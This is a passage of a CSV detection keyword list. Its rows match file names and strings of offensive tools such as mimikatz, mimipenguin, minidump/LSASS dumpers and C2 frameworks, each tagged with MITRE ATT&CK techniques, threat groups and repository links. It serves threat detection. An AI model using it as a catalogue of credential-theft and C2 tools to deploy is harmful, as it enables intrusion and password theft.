+"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimikatz -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*Mimikatz.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*mimikatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*mimikatz_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*mimikatz_dynwrapx*","offensive_tool_keyword","koadic","Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*mimikatz_tashlib*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz_x64.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mimikatz_x86.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MimikatzByPowerShellForDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - 
T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MimikatzOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1793","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" +"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimipenguin*","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3565","645","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" +"*mimipenguin.*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*mimipenguin.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin_x32.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*mimiRatz*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*mimishim.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*minidump*minikerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*minidump.* lsass.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*Minidump.exe*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*minidump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*Minidump.sln*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*minidump_add_memory_block*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 